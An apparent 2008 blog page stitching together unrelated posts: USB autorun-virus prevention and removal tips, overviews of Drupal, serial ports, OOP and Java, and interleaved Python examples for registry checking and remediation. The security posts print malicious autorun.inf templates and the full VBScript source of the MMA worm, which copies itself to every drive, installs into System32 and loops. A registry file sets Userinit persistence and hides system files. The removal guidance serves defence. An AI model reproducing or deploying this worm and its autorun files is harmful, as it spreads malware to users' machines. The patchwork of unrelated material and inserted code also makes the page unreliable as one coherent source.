Sunday, November 30, 2008

Tips to prevent most viruses without using an anti-virus

As most of you know, most of these viruses are launched through an autorun.inf file on the drive. The following tips prevent most of them:

-- Go to Run and type gpedit.msc (you must be logged on as an administrator for this).
-- Under Computer Configuration there is an option Administrative Templates.
-- In it you will find the option Turn Off Autoplay.
-- Double-click it, set it to Enabled and select All drives from the drop-down.
-- Click Apply.

From now on none of your drives will autoplay.
All you have to do is right-click the drive and select Open.
If on right-clicking you find extra options such as Autoplay or garbled text in place of Open and Explore,
go to Tools -> Folder Options -> View, tick Show hidden files and folders, make the operating system files visible too (untick Hide protected operating system files) and click Apply.
Delete all the unwanted files now.

This is a simple and safe technique.

Apart from this you can explore gpedit.msc to learn more ways of improving your PC's performance and also its appearance.

And one more tip..
Never run your computer under the administrator login all the time. Use the admin login only when you want to install something; otherwise always use a restricted (limited user) login. By doing this you hardly stand a chance of being hit by any virus. And never plug a pen drive that was used somewhere else directly into your PC while logged in as admin: clean it from the restricted login first and then use it. Believe me, you will hardly need any anti-virus if you follow these simple things.
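The "Turn Off Autoplay" policy set through gpedit.msc is stored in the registry as a DWORD bitmask named NoDriveTypeAutoRun under the Policies\Explorer key (each set bit disables AutoRun for one drive type; 0xFF disables it everywhere). The following script is an added example, not code from the post: it decodes such a value into the drive types that can still AutoRun, and on Windows reads the effective value (HKLM checked first, then HKCU, which is an assumption of this example) so you can verify the setting actually took.

```python
"""Decode / check the Windows NoDriveTypeAutoRun policy value (added example)."""
import sys

# Bit -> drive type for which that bit disables AutoRun (documented assignments).
DRIVE_TYPE_BITS = {
    0x01: "unknown (DRIVE_UNKNOWN)",
    0x04: "removable (USB sticks, floppies)",
    0x08: "fixed (local hard disks)",
    0x10: "network (mapped shares)",
    0x20: "CD-ROM / DVD",
    0x40: "RAM disk",
    0x80: "unspecified drive type",
}
ALL_DRIVES = 0xFF

# Key the policy editor writes to; the value name is NoDriveTypeAutoRun.
POLICY_SUBKEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def autorun_allowed(value):
    """Return the sorted list of drive types on which AutoRun is still allowed."""
    return sorted(name for bit, name in DRIVE_TYPE_BITS.items() if not value & bit)


def is_fully_disabled(value):
    """True when every drive-type bit is set, i.e. 'All drives' was selected."""
    return (value & ALL_DRIVES) == ALL_DRIVES


def read_policy_value():
    """Read the policy value on Windows; None if unset or not running on Windows.
    Assumption for this example: the machine hive is consulted before the user hive."""
    if sys.platform != "win32":
        return None
    import winreg
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_SUBKEY) as key:
                value, kind = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
                if kind == winreg.REG_DWORD:
                    return value
        except OSError:
            continue
    return None


def report(value):
    """Human-readable verdict for a policy value (None = value not present)."""
    if value is None:
        return "NoDriveTypeAutoRun is not set: AutoRun policy is at the OS default."
    if is_fully_disabled(value):
        return "NoDriveTypeAutoRun=0x%02X: AutoRun disabled on all drive types." % value
    return "NoDriveTypeAutoRun=0x%02X: AutoRun still allowed on: %s" % (
        value, ", ".join(autorun_allowed(value)))


if __name__ == "__main__":
    print(report(read_policy_value()))
```

Run it after applying the policy: the expected line is the "disabled on all drive types" one. Any other verdict means the setting did not reach the registry (for example, gpedit was run without administrator rights).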

Explanations of autorun.inf files

The autorun file through which Explorer.exe is run (the original text after each directive is a comment, written here with the INI comment character so the file stays valid):

[autorun]
OPEN=EXPLORER.EXE                   ; target exe to run
shell\open=??(&O)                   ; text shown in the right-click menu in place of Open
shell\open\Command=EXPLORER.EXE     ; command executed when the first menu option is clicked
shell\open\Default=1                ; each time it is clicked one copy of Explorer.exe is run
shell\explore=?????(&X)             ; text shown in the right-click menu in place of Explore
shell\explore\Command=EXPLORER.EXE  ; instead of the folder/drive being explored, Explorer.exe is run


The autorun file through which sals.xls.exe is run:

[AutoRun]
open=sals.xls.exe                ; executed as soon as the removable disk is plugged in, instead of the regular shell command
shellexecute=sals.xls.exe        ; the shell executes this command
shell\Auto\command=sals.xls.exe  ; executed when the drive is autoplayed
shell=Auto                       ; makes the shell use the Auto verb (autoplay) by default
[VVflagRun]
aabb=kdkfjdkfk11

The autorun file through which Internet Explorer is run each time the drive is opened:

[AutoRun]
open=iexplore.exe
shellexecute=iexplore.exe
shell\Auto\command=iexplore.exe
shell=Auto
[VVflagRun]
aabb=kdkfjdkfk11



The autorun file through which Notepad is run each time the drive is opened:

[autorun]
OPEN=notepad.EXE
shell\open=??(&anyname)
shell\open\Command=notepad.EXE
shell\open\Default=1
shell\explore=?????(&anyname)
shell\explore\Command=notepad.EXE

WARNING: Please do not use these things to cause damage to people.

Virus removal

Removing added registry entries

1. Open Registry Editor. Click Start > Run, type REGEDIT, then press Enter.
2. In the left panel, double-click the following:
   HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Run
3. In the right panel, locate and delete the entry:
   MsServer = "msfir80.exe"
4. In the left panel, double-click the following:
   HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > Run
5. In the right panel, locate and delete the entry:
   IMJPMIG8.2 = "msime80.exe"
6. Close Registry Editor.
Restoring AUTORUN.INF

1. Open the dropped AUTORUN.INF in Notepad. Click Start > Run, type this text string in the Open input box, then press Enter:
   {Malware path}\autorun.inf
2. Delete the following entries created by the malware:
   [AutoRun]
   open=sal.xls.exe
   shellexecute=sal.xls.exe
   shell\Auto\command=sal.xls.exe
   shell=Auto
   [VVflagRun]
   aabb=kdkfjdkfk11
3. Close AUTORUN.INF and click Yes when prompted to save.

Unhide files by going to Start -> Run, typing regsvr32 /u occache.dll and pressing OK. To re-hide them: Start -> Run, type regsvr32 occache.dll and press OK.

Go to the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

Delete the value CheckedValue in the right window. (After the infection its type will be REG_SZ and its data 2.)

Now create a new DWORD value called CheckedValue (same name as above, but of type REG_DWORD). Set its value data to 1 (0x00000001).

This should let you change the "Hidden files and folders" option again.
Please report your results.

MMA virus and removal process

The most famous virus doing the rounds these days is this one: MMA.
It mainly has 4 files along with it:
1. mma.vbs (the source code of this virus)
2. mma.bat (the batch file which executes)
3. a war file named mma
4. the autorun file (the obvious one)

Following is the source code of the MMA virus:

'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")

For i = 1 To 1

    Set Of = CreateObject("Scripting.FileSystemObject")
    Set dir = Of.GetSpecialFolder(1)    ' 1 = the System32 folder

    Set dc = Of.Drives
    ' Is this the copy already installed in System32?
    If WScript.ScriptFullName = dir & "\mma.vbs" Then
        isdir = True
    Else
        a = WshShell.Run("mma.bat Open", 0, False)
        isdir = False
    End If

    ' Copy mma.* and autorun.inf to every fixed (2), network (3) and
    ' removable (1, except A: and B:) drive. mma.bat is run with "-" before
    ' and "+" after each copy; its contents are not shown in the post.
    For Each d In dc
        If d.DriveType = 2 Or d.DriveType = 3 Or (d.DriveType = 1 And d <> "A:" And d <> "B:") Then
            a = WshShell.Run("mma.bat - " & d, 0, True)
            If isdir Then
                Of.CopyFile dir & "\mma.*", d & "\", True
                Of.CopyFile dir & "\autorun.inf", d & "\", True
            Else
                Of.CopyFile "mma.*", d & "\", True
                Of.CopyFile "autorun.inf", d & "\", True
            End If
            a = WshShell.Run("mma.bat + " & d, 0, True)
        End If
    Next

    If isdir Then
        ' Installed copy: wait a minute, then reset the counter so the loop never ends
        WScript.Sleep 60000
        i = 0
    Else
        ' First run from a drive: install itself into System32
        a = WshShell.Run("mma.bat - " & dir, 0, True)
        Of.CopyFile "mma.*", dir & "\", True
        Of.CopyFile "autorun.inf", dir & "\", True
        a = WshShell.Run("mma.bat + " & dir, 0, True)
    End If

Next


How it works

When you double-click on any drive and it does not open, and when you right-click it it does not show an Open or Explore option but something else, the first thing to do is to type the drive letter followed by a colon (for example D:) in the address bar.
Once the drive is open, go to Tools -> Folder Options -> View, select Show hidden files and folders, untick Hide protected operating system files and click OK.
Now you can see all the hidden files too. If you find files named mma, your PC is infected with it.


Steps to remove the MMA virus:

From what I have seen, I don't see any anti-virus detecting this virus.
What you have to do is simple:

Step 1:
Stop the process named WScript.exe from Task Manager.

Step 2:
Remove all the MMA virus files. By the way, I forgot to mention that it also has a registry file.
Before deleting that mma.reg file, right-click it -> Edit and save it as a .txt file.
Now delete all the mma files from all drives. To open a drive, type the drive letter followed by a colon in the address bar and press Enter.

Step 3:
Using the text file you saved, open the Registry Editor and go to the key it lists. There is one entry in Userinit; make sure you remove just the WScript entry, because if you delete the value as a whole your PC might not start. To remove just that entry, right-click the value -> Modify and delete the WScript part.
The second key present in the mma.reg file you can delete fully.

Step 4:
Restart Explorer. Your PC is now free from MMA.

Code of the registry file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000

Removing from the registry:

Just edit the first key and remove only the reference to mma.bat. BE CAREFUL THAT YOU DON'T DELETE THIS VALUE, ELSE YOU WON'T BE ABLE TO LOG ON TO XP.
You can delete the second key safely.
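Because the Userinit value must be edited rather than deleted, it is worth doing the edit mechanically. The script below is an added example, not code from the post: it parses a registry export in the "Windows Registry Editor Version 5.00" format (the mma.reg dump above, reproduced here as a constructed sample), rewrites Userinit so that only userinit.exe remains, and emits a remediation .reg that also restores the two hidden-file settings mentioned earlier in the post (ShowSuperHidden and SHOWALL\CheckedValue). The bare "userinit.exe" fallback used when the value contains no userinit.exe entry at all is this example's assumption; the stock XP value is C:\WINDOWS\system32\userinit.exe followed by a comma.

```python
"""Generate a remediation .reg from a malicious registry dump (added example)."""
import re

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
ADVANCED = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
SHOWALL = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
           r"\Explorer\Advanced\Folder\Hidden\SHOWALL")

KEY_RE = re.compile(r"^\[(.+)\]$")            # [HKEY_...\path]
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')    # "Name"=<raw value text>

# Constructed from the mma.reg dump shown in the post.
SAMPLE_MMA_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
'''


def parse_reg(text):
    """Return {key path (lower-cased): {value name (lower-cased): raw value text}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1).lower()] = m.group(2)
    return keys


def clean_userinit(raw):
    """Keep only userinit.exe entries; return (cleaned raw value, removed entries)."""
    value = raw.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    keep, removed = [], []
    for entry in (e.strip() for e in value.split(",")):
        if not entry:
            continue
        (keep if entry.lower().endswith("userinit.exe") else removed).append(entry)
    if not keep:
        # Assumption for this example: fall back to the bare program name.
        keep = ["userinit.exe"]
    # Windows keeps a trailing comma after the last Userinit entry.
    return '"%s,"' % ",".join(keep), removed


def build_remediation(reg_text):
    """Return (remediation .reg text, list of Userinit entries that were removed)."""
    keys = parse_reg(reg_text)
    removed = []
    lines = ["Windows Registry Editor Version 5.00", ""]
    userinit = keys.get(WINLOGON.lower(), {}).get("userinit")
    if userinit is not None:
        cleaned, removed = clean_userinit(userinit)
        lines += ["[%s]" % WINLOGON, '"Userinit"=%s' % cleaned, ""]
    # Restore the hidden-file settings the post describes.
    lines += ["[%s]" % ADVANCED, '"ShowSuperHidden"=dword:00000001', ""]
    lines += ["[%s]" % SHOWALL, '"CheckedValue"=dword:00000001', ""]
    return "\n".join(lines), removed


if __name__ == "__main__":
    text, removed = build_remediation(SAMPLE_MMA_REG)
    print("removed from Userinit:", removed)
    print(text)
```

Review the printed .reg before importing it with regedit: the only change to Winlogon should be the removal of the foreign entry, and the Userinit line must still end with a comma.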
 

DRUPAL

Introduction:

Drupal is a free and open source modular framework and content management system (CMS) written in the programming language PHP. Like many modern CMSs, Drupal allows the system administrator to create and organize content, customize the presentation, automate administrative tasks, and manage site visitors and contributors.

Drupal is sometimes described as a "Content Management Framework"as its capabilities extend from content management to enabling a wide range of services and transactions. Although Drupal does offer a sophisticated programming interface, basic web site installation and administration can be accomplished with no programming.

Drupal runs in many environments, including Windows, Mac OS X, Linux, FreeBSD, OpenBSD, Solaris 10, OpenSolaris and any platform that supports either the Apache (version 1.3+), or IIS (version IIS5+) Web server and the PHP language (version 4.3.3+). Drupal requires a database such as MySQL or PostgreSQL to store content and settings.

Drupal is distributed under the GPL ("GNU General Public License") and is maintained and developed by a community of thousands of users and developers.

HISTORY:

Originally written by Dries Buytaert as a bulletin board system, Drupal became an open source project in 2001. Drupal is an English transliteration of the Dutch word “druppel,” which means “drop” (as in “a water droplet”). The name was taken from the now-defunct Drop.org website, whose code slowly evolved into Drupal. Buytaert wanted to call the site “dorp” (Dutch for “village,” referring to its community aspects), but made a typo when checking the domain name and thought it sounded better.

From May 2006 to April 2007, Drupal was downloaded from the Drupal.org website more than 600,000 times. A large community now helps develop Drupal.

As of July 2008, Drupal 6.3 is the latest release. 

Uses:

Drupal is a free software package that allows an individual or a community of users to easily publish, manage and organize a wide variety of content on a website. Tens of thousands of people and organizations are using Drupal to power scores of different web sites, including:

Community web portals
Discussion sites
Corporate web sites
Intranet applications
Personal web sites or blogs
Aficionado sites
E-commerce applications
Resource directories
Social Networking sites

Drupal is ready to go from the moment you download it. It even has an easy-to-use web installer! The built-in functionality, combined with dozens of freely available add-on modules, will enable features such as:

Content Management Systems
Blogs
Collaborative authoring environments
Forums
Peer-to-peer networking
Newsletters
Podcasting
Picture galleries
File uploads and downloads
and much more. 

Working of Serial Ports

Serial ports are the connectors on the back of your PC that enable your computer to control devices such as modems, scanners, and printers. Although some serial ports use a 25-pin interface, most only have nine pins. One pin serves as the ground while the others handle the flow of data between a computer and its peripherals. Serial ports are also known as communication (COM) ports, and most PCs have at least one.

Unlike parallel ports, which send a full byte (8 bits) of data at once, serial ports can transfer information only one bit at a time. They use a bidirectional form of communication that allows information to travel back and forth across a cable. RS-232 is the standard serial port design defined by the Electronic Industries Association (EIA). Among its other specifications, an RS-232 serial port can connect a computer to a device located more than 50 meters away.

Serial devices use an asynchronous process to control the transfer of information, relying on special start and stop bits to signal when serial data should or shouldn’t be transmitted. The asynchronous method divides information into packets of one byte each, sometimes including a special parity bit to verify the integrity of the data in each packet.

In your computer, the UART (Universal Asynchronous Receiver/Transmitter) converts the parallel data moving throughout your PC into a serial format that can be used by other serial devices. The procedure is reversed, however, when your computer receives serial data it must work with. The UART is also directly responsible for regulating the flow of serial bits.
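The framing the last two paragraphs describe (start bit, data bits, optional parity bit, stop bit) is easy to model bit for bit. The following is an added example, not from the article: a software UART that serialises bytes as 8 data bits LSB first with one start bit, an even parity bit and one stop bit (the common "8E1" frame; the parity choice and the idle-high line are this example's assumptions), and a receiver that re-synchronises on each start bit and reports frames whose parity or stop bit check fails, which is how corruption on the line is noticed.

```python
"""Bit-level model of asynchronous serial framing (added example, not from the article)."""


def _parity_bit(byte, even=True):
    """Parity bit for one byte: even parity makes the total number of ones even."""
    bit = bin(byte).count("1") % 2          # 1 if the byte has an odd number of ones
    return bit if even else 1 - bit


def frame_byte(byte, even=True):
    """Return the 11 bits for one byte: start(0), 8 data bits LSB first, parity, stop(1)."""
    if not 0 <= byte <= 0xFF:
        raise ValueError("byte out of range")
    data = [(byte >> i) & 1 for i in range(8)]
    return [0] + data + [_parity_bit(byte, even), 1]


def transmit(payload, even=True, idle_bits=2):
    """Serialise bytes into a bit stream; the line idles high (1) between frames."""
    bits = [1] * idle_bits
    for b in payload:
        bits += frame_byte(b, even) + [1] * idle_bits
    return bits


def receive(bits, even=True):
    """Deframe a bit stream.

    Returns (decoded bytes, errors) where errors is a list of (bit offset, reason)
    for frames rejected because the stop bit was wrong or the parity did not match.
    """
    out, errors, i = bytearray(), [], 0
    while i < len(bits):
        if bits[i] == 1:                    # idle line: wait for a start bit
            i += 1
            continue
        frame = bits[i:i + 11]
        if len(frame) < 11:
            errors.append((i, "truncated frame"))
            break
        value = sum(bit << k for k, bit in enumerate(frame[1:9]))
        if frame[10] != 1:
            errors.append((i, "framing error (stop bit not 1)"))
        elif frame[9] != _parity_bit(value, even):
            errors.append((i, "parity error"))
        else:
            out.append(value)
        i += 11                             # skip to the end of this frame
    return bytes(out), errors


if __name__ == "__main__":
    stream = transmit(b"OK")
    print(receive(stream))                  # clean line: (b'OK', [])
    damaged = list(stream)
    damaged[3] ^= 1                         # flip one data bit of the first frame
    print(receive(damaged))                 # (b'K', [(2, 'parity error')])
```

A single flipped bit is caught by parity; two flipped bits in the same frame cancel out, which is why parity is an integrity hint rather than a guarantee, and why the article's "sometimes including" is the right qualifier.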

In most serial communications, a device such as a modem is called the data communications equipment (DCE), while the computer itself is referred to as the data terminal equipment (DTE). The DCE and DTE (or two DTEs) establish a connection described as a “handshake” prior to exchanging data.

Your computer assigns an input/output (I/O) address and an interrupt request line (IRQ) to each serial port in your PC. This designation gives devices priority over each other as they attempt to communicate with your computer. Unfortunately, trouble occurs when two devices are given the same I/O address or IRQ. This conflict can lead to your system shutting down or other PC problems. Therefore, make sure new serial devices are installed only on available I/O addresses and interrupts.

If you think your computer is experiencing a conflict, you can usually change your port configurations through software installed on your system. Consult your PC owner’s manual or activate your operating system’s help feature for instructions on how to fix port conflicts. Also, there are several shareware programs available that may help you detect possible conflicts as well.

Because many devices now use universal serial bus (USB) ports, computer users deal with fewer conflicts. USB ports use a different technology that offers much greater data transfer speeds than both parallel and serial ports. Also, USB ports support the connection of over 100 devices to your PC. But as long as computers continue to use modems, serial ports will probably be needed. Serial ports, despite their conflict issues, use a reliable form of data communications, and have performed quite well over the years.

OOP

Object-oriented programming can be seen as a collection of objects coordinating with each other, rather than the traditional approach in which a program is viewed as a set of tasks (subroutines) given to the computer (the procedural programming model).
Each object is independent of the others, with a distinct role and responsibility, and consists of closely associated actions or operators (which can be applied to that object). For example, an OOP language sees a human as the integration of state (the data/variables, or the characteristics that describe the human) and behaviour (the functions that a human can perform, such as eat, sleep, etc.).
Essentially, data and its functionality are combined and wrapped together to form an object.
One principal benefit of OOP over the procedural approach is that OOP allows you to write modules that need not be changed when new objects are added. You just need to inherit from that class and use the features provided by that object.
Each object is capable of receiving messages from and sending messages to other objects, and of processing data.
Each object can be viewed as having an independent role and responsibility.
Most modern programming languages now support OOP.

Basic Concepts of OOP

Abstraction:

Abstraction is a way to simplify complex problems.
It is a mechanism and practice of reducing and factoring out details so that one can focus on a few concepts at a time.
It can be achieved through composition.
It helps different objects interact with each other.
For example, a car must have a certain basic set of attributes like a gearbox, steering, etc. But the car is not concerned with the inner details of these things; all it is concerned with is how they work when combined together.

Encapsulation:

Concealing an object's details is called encapsulation.
It is a mechanism and practice of reducing and factoring out details so that one can focus on a few concepts at a time.
When we encapsulate, each class is exposed through an interface.
The basic reason for encapsulation is to expose to the client only as much code as is necessary for him to know. This makes it easy to change the core logic.
It can be used to hide the physical storage layout of data, so that if it is changed, the change is restricted to a small subset of the total program.
For example, Maruti may have a method for starting the engine, but it is not necessary that Opel knows how it works. All that Opel must be concerned about is that Maruti can start the engine.

Polymorphism:

Polymorphism is the ability of objects belonging to different genres (classes/data types) to respond to calls of a method having the same name, each according to its type-specific behaviour.
Polymorphism can be achieved in either of two ways:
Overloading methods - one method name used for different functions, selected according to the parameters passed.
Overriding methods - providing a different implementation of the parent class method in the child class.
For example, accelerate() is a method of the class Car, but it is implemented differently for each type of car. The accelerate() method is overridden in each derived class to add class-specific behaviour.

Properties of OOP

Class:

A class defines the abstract characteristics of an object along with its common traits. For example, a class Dog must contain all the general characteristics that any dog possesses and the traits (the things that any dog can do).
A class must be self-descriptive and must provide modularity and structure to the program.
A class is a blueprint or prototype from which objects are created.
A class models the state and behaviour of a real-world or abstract object, but the characteristics of the class should make sense in context.
A class must be such that even a layman who knows the business domain can tell what the class does by looking at it. This means that a class must be self-contained and must make sense in its context.
A class contains properties and methods, which are collectively called the members of the class.
For example, we can say that the class Car would consist of some common features, such as colour and type of windshield (characteristics), and the ability to reach a maximum speed (behaviour).

Object:

An object is a particular instance of a class, having the state and behaviour of the object's class.
For example, a car has a colour, but a Maruti 800 has a red colour. So we can say that the object Maruti 800 is an instance of the class Car.

Method:

An object's abilities comprise its methods.
A method serves as the primary mechanism for object-to-object communication.
A method affects only the object on which it is called and operates on its internal state.
The object Maruti 800 has the ability to accelerate. So accelerate() is one of the Maruti 800's methods.

Inheritance:

Inheritance is just what the name suggests: a sub-class may inherit attributes and methods from its parent class and may introduce some of its own.
A sub-class is a more specific version of its parent class.
It is also known as generalization.
It is intended to help reuse existing code with little or no modification.
The inherited class (derived class) takes over the attributes and behaviour of the pre-existing classes.
For example, consider a class Car. Then a class Maruti will inherit all the attributes of the class Car, like fuel tank, engine, etc., and methods such as economy, steering, etc., while adding specific properties like shape, colour, seats, etc.
Inheritance is an 'is-a' relationship, as in: a Maruti is a Car.
There is also one more type of inheritance, multiple inheritance, which may not always be supported as it is not trivial to implement and use. (A class that derives from more than one class, i.e. has more than one parent class, is said to use multiple inheritance.)

Message Passing:

Message passing is the way by which an object sends data to another object or invokes another object's method.
In the programming world it is known as interfacing.
For example, suppose that in our Car class example the fuel tank object wants to supply fuel to the engine object; it calls the appropriate method of the engine in order to do so.
A pure object-oriented programming language is one that supports all the above-mentioned concepts and properties.
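The Car / Maruti / fuel-tank example that runs through the notes above, worked out in Python as an added example (not part of the original text). It shows a class and its objects, encapsulation (the tank's fuel level is a private attribute changed only through its methods), inheritance (Maruti800 and Opel are Cars), polymorphism by overriding (one loop calls accelerate() on different cars and each responds in its own way) and message passing (FuelTank supplies the Engine by calling its method). Python has no method overloading, so only the overriding form of polymorphism appears; the speeds and fuel amounts are made-up values for the example.

```python
"""Car / Maruti example from the OOP notes, in Python (added example)."""
from abc import ABC, abstractmethod


class Engine:
    def __init__(self):
        self.running = False
        self.fuel_in_engine = 0.0

    def take_fuel(self, litres):
        """Receives the 'here is fuel' message from FuelTank."""
        self.fuel_in_engine += litres
        self.running = self.fuel_in_engine > 0
        return self.running


class FuelTank:
    def __init__(self, litres):
        self.__litres = litres              # encapsulated: private, name-mangled

    @property
    def litres(self):                       # read-only view for the outside world
        return self.__litres

    def supply(self, engine, litres):
        """Message passing: the tank invokes the engine's method to hand over fuel."""
        amount = min(litres, self.__litres)
        self.__litres -= amount
        engine.take_fuel(amount)
        return amount


class Car(ABC):
    """Blueprint for every car: colour, a tank, an engine and a speed."""
    def __init__(self, colour, fuel_litres):
        self.colour = colour
        self.tank = FuelTank(fuel_litres)
        self.engine = Engine()
        self.speed = 0

    def start(self):
        return self.tank.supply(self.engine, 1.0) > 0

    @abstractmethod
    def accelerate(self):
        """Overridden in each derived class: type-specific behaviour."""

    def describe(self):
        return "%s %s at %d km/h" % (self.colour, type(self).__name__, self.speed)


class Maruti800(Car):                       # Maruti800 is-a Car
    def accelerate(self):
        self.speed = min(self.speed + 10, 120)
        return self.speed


class Opel(Car):                            # Opel is-a Car
    def accelerate(self):
        self.speed = min(self.speed + 25, 180)
        return self.speed


def drive_all(cars, presses):
    """Polymorphism: the same call, resolved to the right accelerate() per object."""
    for car in cars:
        car.start()
        for _ in range(presses):
            car.accelerate()
    return [car.describe() for car in cars]


if __name__ == "__main__":
    print(drive_all([Maruti800("red", 30), Opel("blue", 40)], 3))
```

Note that `Car` itself cannot be instantiated (it is abstract because accelerate() has no implementation), and that `tank.__litres` is not reachable from outside the class: the only ways to change the fuel level are the tank's own methods, which is what the encapsulation section means by exposing a class only through its interface.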

How Java works

Java, a programming language developed by Sun Microsystems, is expected to be one of the cornerstones of building an intranet. Using Java, programmers can tie into corporate data from an intranet, enabling use of legacy systems such as databases. Java can also be used by programmers, editors, and artists to create multimedia programming. Java will also be able to create customized intranet programs for everything from workgroup computing to electronic commerce.

Java is similar to the C++ computer language and is object-oriented, which means that programs can be created by using many pre-existing components, instead of having to write the entire program from scratch. This will be a great help on intranets, since it will allow corporate programmers to share components and so build customized applications much more quickly. Java is a compiled language, which means that after a Java program is written, the program must be run through a compiler in order to turn the program into a language that a computer can understand. Java differs from other compiled languages, however. In other compiled languages, computer-specific compilers create different executable binary code for all the different computers that the program can run on. In Java, by contrast, a single compiled version of the program, called Java bytecode, is created by a compiler. Interpreters on different computers (such as a PC, Macintosh, or SPARC workstation) understand the Java bytecode and run the program. In this way, a Java program can be created once, and then used on many different kinds of computers.

Java programs designed to run inside a Web browser are called applets. Applets are a subset of Java and for security reasons cannot read from or write to local files, whereas full Java can do so. Java-enabled browsers have Java bytecode interpreters in them. After a Java applet is compiled into bytecodes, it is copied to an intranet Web server and the necessary link is put in HTML. When someone on an intranet visits a home page with a Java applet on it, the applet automatically downloads to their computer. The applet doesn't wait for an invitation. That is why there is so much concern about viruses being embedded in applets. In order to run the Java applet, you will need a Web browser that has a bytecode interpreter that can run Java applets. Many browsers designed for intranets, such as Netscape, have these built into them.

Since Java applets are programs that run on your computer, they could theoretically carry a virus just like any other computer program. To help ensure that no viruses can infect your computer, when a Java applet is downloaded to your computer, the applet first goes through verification, a process that checks that the bytecodes can be safely run. However, again, applets cannot read from or write to local files, which are usually involved in virus attacks, so this should reduce the virus infection risk substantially. After the bytecodes have been verified, the Java interpreter in the browser puts them into a restricted area in your computer's memory and runs them. By putting the applet into this special area of your computer, further care is taken that no virus can harm your computer. Then the Java applet is run.

Applets can query databases by presenting a list of queries or data entry forms to the user. They can assist searching intranet sites by creating more sophisticated searching mechanisms than are possible with HTML. Most important, since the client's CPU cycles are used rather than the server's, all kinds of multimedia, including animation and interactivity, are possible with Java applets. Java will have special Application Programming Interfaces (APIs) and other kinds of software "hooks" to allow intranet programmers to more easily integrate intranet programs such as Web browsers with existing corporate databases and networks.

Java and its features

What is Java?

Java is a powerful object-oriented programming language whose syntax is similar to C and C++.
Java is platform independent and requires just a Java Virtual Machine to be installed on the machine for Java applications to run on it.
Java sticks more strictly to object-oriented principles through static binding of objects and by providing an exception handling mechanism with exception handling classes.
Java code can be written in a simple Notepad application too, so we can open the Java application source code and read or edit it.

Some features of Java are:

Simple: The structure of Java is a cleaner version of C++, which needed structures, pointers, operator overloading, unions, header files, virtual base classes, etc. Apart from this, Java was built with the basic purpose of making small stand-alone software, which makes it simpler.

Architecture neutral: The compiled code generated by the Java compiler can be executed on any processor. The compiler does this by generating byte code, which has nothing to do with the architecture of the machine. It is the Java runtime that converts this byte code to native code on the fly.

Object oriented: The features of Java make it an object-oriented programming language. The smallest programmatic building block of a Java program is a class. No method or data structure can exist or be accessed outside a class definition at runtime.

Portable: There are Java libraries available which make Java code portable to any platform. For example, there is an abstract window class with implementations for the UNIX, Windows and Macintosh operating systems.

Distributed: In Java we have a set of libraries that support TCP/IP protocols such as HTTP and FTP, which make accessing files over the Internet an easy affair. Apart from this, Java also supports RMI (Remote Method Invocation), which makes accessing remote file systems an easy job too.

Multithreaded: Java gives better real-time, interactive and responsive behaviour using multithreading. Implementing multithreading in Java is a very simple task.

Dynamic: Java is dynamic in the sense that new functions can be added to the libraries or classes without actually bothering the client. Apart from this, it is very easy to get runtime information in Java.

Robust: Java detects many possible problems at compile time itself, along with checking for errors at runtime, which makes Java more robust. Also, Java eliminates the possibility of overwriting memory or corrupting data by not exposing a raw pointer model.

Secure: Java is a secure language as it allows Java code to execute only within the Java environment and does not allow it access to other parts of the computer.

Interpreted: Java byte code can be executed on the fly on any machine to which the Java interpreter has been shipped.

High performance: The just-in-time compilation technique makes Java a high-performance programming language. The "Just in Time" (JIT) compilers convert the byte code to native code as and when needed. They also maintain a cache of this compiled code, so that code which has already been compiled is fetched from the cache when it is called again instead of being compiled each time. This improves performance tremendously.
Apart from this, the major advantage of using Java is that it has automatic garbage collection, which is invoked by the JVM when the need arises.